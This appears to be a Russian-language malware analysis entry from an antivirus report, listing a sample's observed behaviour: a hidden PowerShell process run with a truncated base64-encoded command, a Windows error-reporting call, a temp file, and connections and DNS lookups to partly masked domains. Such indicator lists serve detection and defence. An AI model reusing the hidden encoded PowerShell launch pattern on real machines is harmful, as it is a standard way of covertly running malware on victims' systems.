Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABVAHcAZQB0AHIAbABwAGUAYQBpAGMAPQAnAEYAagBqAHoAcgB5AGcAaABzAHUAJwA7ACQARABsAGoAaAB5AGcAcQBsAG4AbgBlACAAPQAgACcANAAyADIAJwA7ACQAVQBlAGsAegBpAGsAdgB3AHQAcAA9ACc...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1576
- %TEMP%\808131.cvr
- 'yo###odian.com':443
- 'os####ycleaning.com':443
- 'on###issme.com':443
- 'yo###odian.com':443
- 'os####ycleaning.com':443
- DNS ASK yo###odian.com
- DNS ASK go###skyfc.com
- DNS ASK na#####milywines.com
- DNS ASK os####ycleaning.com
- DNS ASK on###issme.com